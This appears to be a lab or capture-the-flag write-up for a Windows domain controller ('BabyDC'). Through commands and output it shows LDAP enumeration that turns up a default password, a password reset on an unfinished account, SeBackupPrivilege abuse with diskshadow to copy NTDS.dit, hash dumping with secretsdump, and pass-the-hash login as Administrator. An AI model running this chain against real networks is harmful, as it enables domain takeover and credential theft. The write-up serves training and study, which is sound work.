$ nmap -sV -sC -PN -p- -oA baby_nmap 10.129.189.110
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-27 23:35 CEST
Nmap scan report for 10.129.189.110
Host is up (0.028s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-09-27 21:38:10Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-09-27T21:39:40+00:00; +20s from scanner time.
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Not valid before: 2025-08-18T12:14:43
|_Not valid after: 2026-02-17T12:14:43
| rdp-ntlm-info:
| Target_Name: BABY
| NetBIOS_Domain_Name: BABY
| NetBIOS_Computer_Name: BABYDC
| DNS_Domain_Name: baby.vl
| DNS_Computer_Name: BabyDC.baby.vl
| DNS_Tree_Name: baby.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-09-27T21:39:00+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
51410/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
51411/tcp open msrpc Microsoft Windows RPC
51420/tcp open msrpc Microsoft Windows RPC
53398/tcp open msrpc Microsoft Windows RPC
64823/tcp open msrpc Microsoft Windows RPC
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Repeated the scan for UDP ports and found an open port on 53/UDP:
$ sudo nmap -sV -sC -PN -sU -p 53,69,161,162,10161,10162,623 10.129.189.110
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-27 23:41 CEST
Nmap scan report for 10.129.189.110
Host is up (0.039s latency).
PORT STATE SERVICE VERSION
53/udp open domain Simple DNS Plus
69/udp open|filtered tftp
161/udp open|filtered snmp
162/udp open|filtered snmptrap
623/udp open|filtered asf-rmcp
10161/udp open|filtered snmpdtls
10162/udp open|filtered snmpdtls-trap
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Although there is a lot of open ports, all of them are to be expected on a domain controller and none of them really stand out. The domain controller does have an SMB server running, but both anonymous access and the guest account have been disabled:
The output above lists the accounts by their distinguished names. A more useful list of user account names can be generated by querying LDAP for each user's sAMAccountName using ldapsearch:
Before moving on to more noisy enumeration methods, it's worth checking the description field for each of the accounts. NetExec has a built-in filter for this which is accessed using -M get-desc-users:
$ nxc ldap 10.129.189.110 -u '' -p '' -M get-desc-users
SMB 10.129.189.110 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
LDAP 10.129.189.110 389 BABYDC [+] baby.vl\:
GET-DESC... 10.129.189.110 389 BABYDC [+] Found following users:
GET-DESC... 10.129.189.110 389 BABYDC User: Guest description: Built-in account for guest access to the computer/domain
GET-DESC... 10.129.189.110 389 BABYDC User: Teresa.Bell description: Set initial password to BabyStart123!
From the description field, it looks like the default password for new users might be BabyStart123!. If so, Theresa.Bell has changed their password since, as attempts at authenticating with the initial password returned an error:
Going back to the two lists of users obtained with nxc and ldapsearch, there is one user (Caroline Robinson) that's missing from the second list. In fact, when querying LDAP for this user, it looks like the account isn't fully set up:
$ smbpasswd -r 10.129.189.110 -U caroline.robinson
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user caroline.robinson
With the password set, the target can be accessed as Caroline.Robinson using Evil-WinRM:
*Evil-WinRM* PS C:\Users\Caroline.Robinson\desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
The privilege allows a user to access any file for backup purposes, even if they don't have access to the folder that contains the file. This includes the NTDS.dit database, which can be used for a domain takeover.
There are several ways of accessing NTDS.dit, one of which is to create a shadow copy of C:\ and copy it using the Copy-FileSeBackupPrivilege cmdlet from the SeBackupPrivilege toolkit.
The toolkit first needs to be uploaded and imported on the target:
*Evil-WinRM* PS C:\Users\Caroline.Robinson>diskshadow.exe
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: BABYDC, 9/28/2025 8:10:55 PM
DISKSHADOW> Error reading from console. Win32 error: 0x(null)
The pipe has been ended.
Fortunately, the tool can be run in batch mode with the /s argument. A batch in this case is a simple text file with the required commands to create a shadow copy of C:\:
$ cat backup.txt
set context persistent nowriters
add volume c: alias pwn
create
expose %pwn% z:
Important
DiskShadow doesn't work with files with UNIX line endings. Although the batch file is accepted and processed without errors, no shadow copy is created.
If the batch file is created on Linux, it needs to be converted to DOS line endings before upload:
*Evil-WinRM* PS C:\Users\Caroline.Robinson> diskshadow.exe /s backup.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: BABYDC, 9/28/2025 8:43:50 PM
-> set context persistent nowriters
-> add volume c: alias pwn
-> create
Alias pwn for shadow ID {33c2e824-2914-4d85-8076-6001a6c7e1b8} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {5b3515bd-50c5-4106-b715-d946b4f4f406} set as environment variable.
Querying all shadow copies with the shadow copy set ID {5b3515bd-50c5-4106-b715-d946b4f4f406}
* Shadow copy ID = {33c2e824-2914-4d85-8076-6001a6c7e1b8} %pwn%
- Shadow copy set: {5b3515bd-50c5-4106-b715-d946b4f4f406} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{711fc68a-0000-0000-0000-100000000000}\ [C:\]
- Creation time: 9/28/2025 8:43:50 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
- Originating machine: BabyDC.baby.vl
- Service machine: BabyDC.baby.vl
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %pwn% z:
-> %pwn% = {33c2e824-2914-4d85-8076-6001a6c7e1b8}
The shadow copy was successfully exposed as z:\.
->
NTDS.dit can be copied from the shadow copy with the Copy-FileSeBackupPrivilege:
$ impacket-secretsdump -ntds ntds.dit -system system.sav LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 41d56bf9b458d01951f592ee4ba00ea6
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:...
Used the nthash from the dump above to access the target as Administrator using Evil-WinRM: